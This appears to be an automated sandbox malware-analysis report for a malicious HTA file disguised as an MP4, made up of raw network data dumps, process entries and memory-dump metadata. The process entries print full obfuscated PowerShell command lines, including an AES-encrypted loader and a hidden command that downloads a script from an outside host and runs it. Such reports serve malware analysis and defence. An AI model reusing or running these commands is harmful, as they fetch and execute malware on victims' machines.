                                                          2025-01-01 16:11:25 UTC240INData Raw: 62 66 63 0d 0a 78 38 47 4a 78 4e 76 50 64 56 43 4e 6e 4b 50 73 6c 67 53 4e 66 2b 6f 6f 45 61 70 4c 7a 59 53 75 68 62 57 43 4f 46 74 7a 4e 42 71 63 75 71 75 69 72 2b 31 50 59 61 47 2b 78 73 36 73 4e 61 46 64 6a 67 6f 72 69 41 32 45 2f 75 48 58 77 2f 56 70 49 51 56 6b 54 76 57 4b 34 37 47 49 6a 55 41 64 33 4f 58 5a 75 4e 6c 57 75 52 75 65 58 33 50 45 50 35 75 33 6d 75 37 4d 73 6e 51 44 4b 30 78 41 39 72 50 54 67 34 66 67 4a 78 54 43 70 4a 71 4b 7a 33 58 43 53 71 4e 67 65 74 49 50 67 63 72 6a 73 50 33 71 43 6d 67 78 51 58 7a 32 6d 65 2b 74 6a 34 4d 6b 4a 4f 6e 36 34 62 2f 62 66 75 59 64 30 6d 31 63 6e 54 48 39 76 63 66 71 67 75 6c 66 50 69 64 78 56 37 54 78 38 36 2b 2b 68 78 63 7a 79 71 6d 55 75 76 49 76 78 7a 47
                                                          Data Ascii: bfcx8GJxNvPdVCNnKPslgSNf+ooEapLzYSuhbWCOFtzNBqcuquir+1PYaG+xs6sNaFdjgoriA2E/uHXw/VpIQVkTvWK47GIjUAd3OXZuNlWuRueX3PEP5u3mu7MsnQDK0xA9rPTg4fgJxTCpJqKz3XCSqNgetIPgcrjsP3qCmgxQXz2me+tj4MkJOn64b/bfuYd0m1cnTH9vcfqgulfPidxV7Tx86++hxczyqmUuvIvxzG
                                                          2025-01-01 16:11:25 UTC1369INData Raw: 38 61 79 43 62 63 34 72 30 34 4c 58 6d 30 6b 45 77 43 30 34 74 76 70 6a 43 71 62 4b 6e 49 57 6a 55 31 35 4f 37 38 55 50 61 53 70 77 61 56 75 30 64 2f 4d 44 71 33 49 33 48 51 44 63 2b 54 46 53 67 73 38 4b 7a 73 66 77 79 47 37 72 79 78 61 50 75 66 50 35 4c 70 33 31 44 6b 79 47 63 35 74 62 68 30 50 68 33 44 7a 46 42 66 4b 75 47 32 61 32 50 6c 69 51 67 31 2f 72 67 71 50 31 30 35 44 66 53 62 56 79 64 4d 66 32 39 78 2b 71 43 38 31 38 2b 4a 31 6c 54 71 66 48 6a 70 37 36 48 46 44 50 4b 71 5a 53 36 7a 69 2f 48 4d 70 35 72 49 4a 74 7a 69 38 37 55 79 75 66 30 54 78 6f 4a 51 6b 71 54 38 38 4b 75 72 70 77 33 5a 63 44 4a 32 70 62 53 53 39 39 4c 6a 6c 78 41 79 43 57 2b 74 5a 32 78 33 76 73 49 46 79 74 73 62 5a 53 72 78 50 47 63 6b 31 6f 53 79 64 4f 62 31 64 6c 4e 2f 44
                                                          Data Ascii: 8ayCbc4r04LXm0kEwC04tvpjCqbKnIWjU15O78UPaSpwaVu0d/MDq3I3HQDc+TFSgs8KzsfwyG7ryxaPufP5Lp31DkyGc5tbh0Ph3DzFBfKuG2a2PliQg1/rgqP105DfSbVydMf29x+qC818+J1lTqfHjp76HFDPKqZS6zi/HMp5rIJtzi87Uyuf0TxoJQkqT88Kurpw3ZcDJ2pbSS99LjlxAyCW+tZ2x3vsIFytsbZSrxPGck1oSydOb1dlN/D
                                                          2025-01-01 16:11:25 UTC1369INData Raw: 6e 52 32 70 72 2b 54 49 77 63 45 4a 61 6b 74 79 55 37 32 4f 32 37 4b 73 6e 67 38 6d 33 63 69 52 70 2f 78 78 33 6a 33 66 5a 55 44 54 4d 5a 6e 4c 2f 4c 48 52 39 6b 38 35 48 55 42 4d 39 50 58 69 76 65 75 44 4c 51 6a 36 79 63 6d 68 6f 30 50 52 55 4b 68 73 58 70 4a 79 6e 64 33 66 79 6f 44 4c 63 44 41 4c 63 46 61 4a 6a 4c 79 4d 73 2f 31 47 45 76 6a 35 6b 72 54 77 62 64 6b 7a 75 31 78 31 7a 41 6d 65 79 64 54 75 31 37 70 39 46 6b 52 4f 4b 76 36 6f 35 76 4f 77 71 42 41 45 79 4e 48 51 33 4f 78 76 36 44 65 49 53 31 61 66 66 4a 76 67 68 63 2f 34 39 6e 74 71 51 67 78 63 6a 72 76 47 6c 71 32 34 4a 43 72 37 7a 50 66 65 33 57 37 34 4c 4b 67 64 58 50 73 79 74 39 44 68 31 34 48 6d 54 43 77 52 57 6d 36 52 38 72 32 76 6f 76 38 35 43 4e 58 72 39 6f 62 62 4d 63 6f 6a 78 57 70
                                                          Data Ascii: nR2pr+TIwcEJaktyU72O27Ksng8m3ciRp/xx3j3fZUDTMZnL/LHR9k85HUBM9PXiveuDLQj6ycmho0PRUKhsXpJynd3fyoDLcDALcFaJjLyMs/1GEvj5krTwbdkzu1x1zAmeydTu17p9FkROKv6o5vOwqBAEyNHQ3Oxv6DeIS1affJvghc/49ntqQgxcjrvGlq24JCr7zPfe3W74LKgdXPsyt9Dh14HmTCwRWm6R8r2vov85CNXr9obbMcojxWp
                                                          2025-01-01 16:11:25 UTC97INData Raw: 62 33 48 36 6f 48 6b 5a 48 52 43 66 32 6d 44 6d 65 53 75 75 71 35 4d 48 4f 37 62 6c 70 62 33 59 2f 6c 55 69 46 31 32 32 69 71 62 31 70 33 49 7a 66 64 62 50 78 67 43 62 4b 4f 59 34 34 32 68 6f 69 55 36 7a 39 69 61 71 39 39 77 2b 54 6d 32 42 31 2f 36 50 35 76 76 2b 74 50 54 73 58 30 4a 0d 0a
                                                          Data Ascii: b3H6oHkZHRCf2mDmeSuuq5MHO7blpb3Y/lUiF122iqb1p3IzfdbPxgCbKOY442hoiU6z9iaq99w+Tm2B1/6P5vv+tPTsX0J
                                                          2025-01-01 16:11:25 UTC1369INData Raw: 32 61 38 38 0d 0a 41 51 52 31 71 49 37 54 76 6f 4f 48 4a 52 79 34 30 5a 48 61 38 6e 7a 73 47 4c 68 76 49 70 34 6f 35 73 66 64 74 4d 66 7a 56 6a 34 67 51 46 6d 51 6c 76 79 72 76 4b 73 47 47 66 2f 6b 2b 39 54 41 55 75 34 74 33 33 35 4e 68 58 32 41 30 4a 62 51 30 63 68 67 48 68 46 52 54 6f 4f 6e 38 4b 69 61 67 77 63 39 7a 36 76 4b 71 64 45 30 2b 42 61 6f 55 46 58 5a 4a 34 50 58 32 4f 6d 47 32 6d 30 49 4b 77 4d 78 69 6f 44 2b 74 34 4c 2b 4c 41 4c 35 74 2b 75 6b 39 47 33 33 46 61 56 35 4a 4a 31 37 6d 73 44 6b 38 4e 37 49 41 44 41 4b 42 46 61 66 6d 66 47 39 6e 2f 67 2f 4d 74 47 7a 79 36 37 53 64 63 4d 34 6e 6e 42 47 6d 44 47 65 37 73 62 68 2f 64 42 32 50 52 31 6a 58 62 2b 55 2f 4b 66 76 68 78 4d 69 34 4b 37 71 74 73 52 64 35 69 32 51 58 58 7a 6d 50 4a 7a 58 7a
                                                          Data Ascii: 2a88AQR1qI7TvoOHJRy40ZHa8nzsGLhvIp4o5sfdtMfzVj4gQFmQlvyrvKsGGf/k+9TAUu4t335NhX2A0JbQ0chgHhFRToOn8Kiagwc9z6vKqdE0+BaoUFXZJ4PX2OmG2m0IKwMxioD+t4L+LAL5t+uk9G33FaV5JJ17msDk8N7IADAKBFafmfG9n/g/MtGzy67SdcM4nnBGmDGe7sbh/dB2PR1jXb+U/KfvhxMi4K7qtsRd5i2QXXzmPJzXz
                                                          2025-01-01 16:11:25 UTC1369INData Raw: 4c 4b 44 31 5a 66 36 4b 43 36 49 61 56 76 6a 45 35 34 39 75 55 6c 71 56 32 76 53 69 72 63 58 75 66 4c 36 6a 53 34 4e 58 44 7a 52 4d 51 43 32 35 4a 67 70 43 69 73 49 69 36 42 77 66 6d 72 5a 58 64 31 57 58 48 43 37 39 61 49 4f 34 6e 6e 4c 57 58 34 2f 54 52 66 44 4a 48 41 32 43 33 6e 61 62 76 6a 5a 6b 63 5a 2b 6e 4c 30 4e 2f 51 56 62 55 62 33 68 70 72 77 53 36 6d 31 50 79 7a 31 2f 52 2b 62 6b 74 33 64 4c 58 34 77 6f 2b 66 76 52 63 49 77 73 37 56 6c 65 42 4b 36 67 69 5a 59 6d 6e 7a 45 72 6d 76 36 66 2f 45 78 6e 39 71 4b 77 64 79 38 50 48 65 67 4a 47 36 48 68 71 31 39 39 72 63 32 6c 7a 56 42 72 4a 38 52 65 34 4e 67 71 2f 57 79 2f 76 52 41 54 6b 53 51 57 33 2f 6f 38 79 55 36 36 34 38 45 73 76 33 6b 4c 72 34 62 4e 38 4f 74 67 64 64 67 53 79 6f 31 73 7a 52 30 4f
                                                          Data Ascii: LKD1Zf6KC6IaVvjE549uUlqV2vSircXufL6jS4NXDzRMQC25JgpCisIi6BwfmrZXd1WXHC79aIO4nnLWX4/TRfDJHA2C3nabvjZkcZ+nL0N/QVbUb3hprwS6m1Pyz1/R+bkt3dLX4wo+fvRcIws7VleBK6giZYmnzErmv6f/Exn9qKwdy8PHegJG6Hhq199rc2lzVBrJ8Re4Ngq/Wy/vRATkSQW3/o8yU6648Esv3kLr4bN8OtgddgSyo1szR0O
                                                          2025-01-01 16:11:25 UTC1369INData Raw: 52 6b 7a 32 74 66 32 52 74 50 73 55 4f 4c 33 49 2b 39 2f 2b 4d 37 30 6f 72 6d 4a 6b 77 51 48 31 37 39 65 31 2b 64 70 67 49 77 70 77 4c 59 32 41 2b 49 61 5a 69 77 5a 70 79 75 6a 37 75 39 68 42 77 44 32 64 66 58 66 2b 50 72 66 44 31 72 65 47 36 6d 73 55 52 6e 64 52 73 59 66 78 6e 6f 69 6a 45 6e 76 2b 7a 4f 43 48 35 6a 47 39 4d 71 78 75 49 76 5a 6b 75 74 65 5a 74 64 4c 6e 62 42 34 4c 57 31 75 31 67 4d 4b 4c 75 61 63 78 47 50 66 6c 7a 36 6e 7a 58 4e 6c 47 6f 57 52 4e 68 58 71 56 7a 75 62 76 33 64 51 41 46 6a 4a 44 61 5a 4b 64 70 70 43 51 72 54 38 31 33 37 66 52 6f 4f 35 4c 33 45 72 64 61 30 62 59 4a 5a 33 4e 79 76 33 68 77 58 45 4f 4f 32 78 74 70 59 36 78 73 37 79 71 45 52 54 50 2b 4e 53 6b 7a 48 58 43 53 4b 59 62 56 4a 30 4b 2b 75 44 70 74 65 54 51 5a 48 51
                                                          Data Ascii: Rkz2tf2RtPsUOL3I+9/+M70ormJkwQH179e1+dpgIwpwLY2A+IaZiwZpyuj7u9hBwD2dfXf+PrfD1reG6msURndRsYfxnoijEnv+zOCH5jG9MqxuIvZkuteZtdLnbB4LW1u1gMKLuacxGPflz6nzXNlGoWRNhXqVzubv3dQAFjJDaZKdppCQrT8137fRoO5L3Erda0bYJZ3Nyv3hwXEOO2xtpY6xs7yqERTP+NSkzHXCSKYbVJ0K+uDpteTQZHQ
                                                          2025-01-01 16:11:25 UTC1369INData Raw: 5a 58 2f 39 49 71 31 42 51 6a 75 35 4e 71 57 34 31 66 50 53 71 64 35 4a 2b 30 76 71 39 37 67 77 63 48 67 51 68 77 48 59 69 6e 7a 70 4d 71 56 6e 70 34 62 4b 64 58 49 6d 35 76 62 62 63 73 4e 71 48 70 65 77 68 32 31 2f 65 76 77 32 2b 42 2b 45 43 74 65 4b 50 65 69 36 49 69 4a 70 79 63 68 2b 39 44 57 33 4d 63 30 35 6a 61 61 63 46 76 4f 4d 61 72 51 34 2b 75 65 75 31 30 4e 51 48 6c 35 74 50 62 69 6f 37 36 62 4d 42 2f 37 30 4f 57 36 35 30 4c 6e 4b 36 68 4e 58 2f 6f 75 6a 37 44 43 34 38 7a 57 54 69 67 66 42 33 69 4e 6b 74 47 33 37 34 49 6b 4a 2f 37 52 6c 62 43 35 62 4e 74 4f 6d 6d 56 41 6e 42 36 55 39 38 54 49 35 2b 70 50 4f 55 42 65 55 4c 4b 4f 2f 4c 32 51 39 7a 4a 6b 78 73 62 62 72 71 46 43 7a 79 32 59 61 6e 4c 4f 45 71 50 53 31 73 33 7a 31 45 34 4c 4d 67 56 35
                                                          Data Ascii: ZX/9Iq1BQju5NqW41fPSqd5J+0vq97gwcHgQhwHYinzpMqVnp4bKdXIm5vbbcsNqHpewh21/evw2+B+ECteKPei6IiJpych+9DW3Mc05jaacFvOMarQ4+ueu10NQHl5tPbio76bMB/70OW650LnK6hNX/ouj7DC48zWTigfB3iNktG374IkJ/7RlbC5bNtOmmVAnB6U98TI5+pPOUBeULKO/L2Q9zJkxsbbrqFCzy2YanLOEqPS1s3z1E4LMgV5
                                                          2025-01-01 16:11:25 UTC1369INData Raw: 61 30 76 7a 63 65 70 73 6a 6c 70 65 78 4c 37 77 57 62 66 46 7a 6c 47 36 37 54 78 66 2f 41 30 58 70 75 53 6c 6c 52 2f 37 44 43 6b 36 79 6d 4a 53 50 31 36 63 57 59 6f 6d 62 55 53 62 35 38 59 4e 73 61 6f 64 62 50 34 74 4c 76 56 6a 6f 63 42 33 36 39 69 63 57 4c 37 6f 59 39 4f 2f 58 59 36 74 54 59 50 63 68 55 6b 78 78 58 6e 41 54 37 39 75 62 78 35 72 46 73 45 43 56 33 66 4c 4c 77 77 5a 47 33 2b 7a 38 64 30 62 50 5a 33 4b 64 43 75 44 69 6a 51 30 4c 37 63 36 69 7a 6e 76 2f 65 35 31 51 54 48 6e 4a 62 6b 71 2f 63 68 35 79 62 52 44 66 2f 7a 76 58 5a 78 31 47 39 42 64 4a 50 49 5a 38 38 69 39 33 63 7a 4d 2f 4a 51 51 64 63 58 45 71 2b 72 65 50 33 69 36 6f 62 46 37 33 4c 35 36 62 6a 62 38 64 48 67 56 45 68 35 68 4f 56 2f 63 69 75 2b 38 30 50 50 79 52 67 53 49 4f 74 79
                                                          Data Ascii: a0vzcepsjlpexL7wWbfFzlG67Txf/A0XpuSllR/7DCk6ymJSP16cWYombUSb58YNsaodbP4tLvVjocB369icWL7oY9O/XY6tTYPchUkxxXnAT79ubx5rFsECV3fLLwwZG3+z8d0bPZ3KdCuDijQ0L7c6iznv/e51QTHnJbkq/ch5ybRDf/zvXZx1G9BdJPIZ88i93czM/JQQdcXEq+reP3i6obF73L56bjb8dHgVEh5hOV/ciu+80PPyRgSIOty


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:11:09:57
                                                          Start date:01/01/2025
                                                          Path:C:\Windows\SysWOW64\mshta.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:mshta.exe "C:\Users\user\Desktop\web44.mp4.hta"
                                                          Imagebase:0x3b0000
                                                          File size:13'312 bytes
                                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:11:09:59
                                                          Start date:01/01/2025
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A745966437058494F437867616E6175')),[byte[]]::new(16)).TransformFinalBlock($mBfyr,0,$mBfyr.Length)); & $AjiG.Substring(0,3) $AjiG.Substring(129)
                                                          Imagebase:0xb30000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:11:09:59
                                                          Start date:01/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:11:10:01
                                                          Start date:01/01/2025
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
                                                          Imagebase:0xb30000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2455403030.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:11:10:01
                                                          Start date:01/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:11:11:13
                                                          Start date:01/01/2025
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                          Imagebase:0xb30000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Reset < >
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_6970000_mshta.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
                                                            • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction Fuzzy Hash:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_6970000_mshta.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
                                                            • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction Fuzzy Hash:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_6970000_mshta.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
                                                            • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction Fuzzy Hash:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_6970000_mshta.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
                                                            • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction Fuzzy Hash:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_6970000_mshta.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
                                                            • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction Fuzzy Hash:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_6970000_mshta.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
                                                            • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction Fuzzy Hash:
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000003.1710074738.0000000006970000.00000010.00000800.00020000.00000000.sdmp, Offset: 06970000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_3_6970000_mshta.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction ID: 20176766b88130c6d51579b137aca6fc5e4d7ce9e9ab6555025127cea8082731
                                                            • Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
                                                            • Instruction Fuzzy Hash:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (Xcq$LR^q
                                                            • API String ID: 0-2856513941
                                                            • Opcode ID: fbe850fea0efb6543f5041739f5f40757a4b53272298081f08b3e279a8a792f4
                                                            • Instruction ID: 5f6e04b35be12dc034067f41dff2c96f39c2dd80a7609a7b0af321073cacae1a
                                                            • Opcode Fuzzy Hash: fbe850fea0efb6543f5041739f5f40757a4b53272298081f08b3e279a8a792f4
                                                            • Instruction Fuzzy Hash: 03527B34B00218CFEB24DB64D854BADB7B2BF85304F1184A9E949AB395DB34ED85CF52
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_40a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (Xcq$LR^q
                                                            • API String ID: 0-2856513941
                                                            • Opcode ID: b19c3448b753754b05fd9ed6cecdaae20f45da3a2ca6e3aea4f509214338872c
                                                            • Instruction ID: b0d826820ff6706c9ca839af0eac5f28ef36e1b9634f00341196ff83d65a0772
                                                            • Opcode Fuzzy Hash: b19c3448b753754b05fd9ed6cecdaae20f45da3a2ca6e3aea4f509214338872c
                                                            • Instruction Fuzzy Hash: 50514A30B002188FDB24DF68D854B9DBBB2FF88304F1185A9E549AB395DB71AD45CB92
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1699855567.00000000040A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
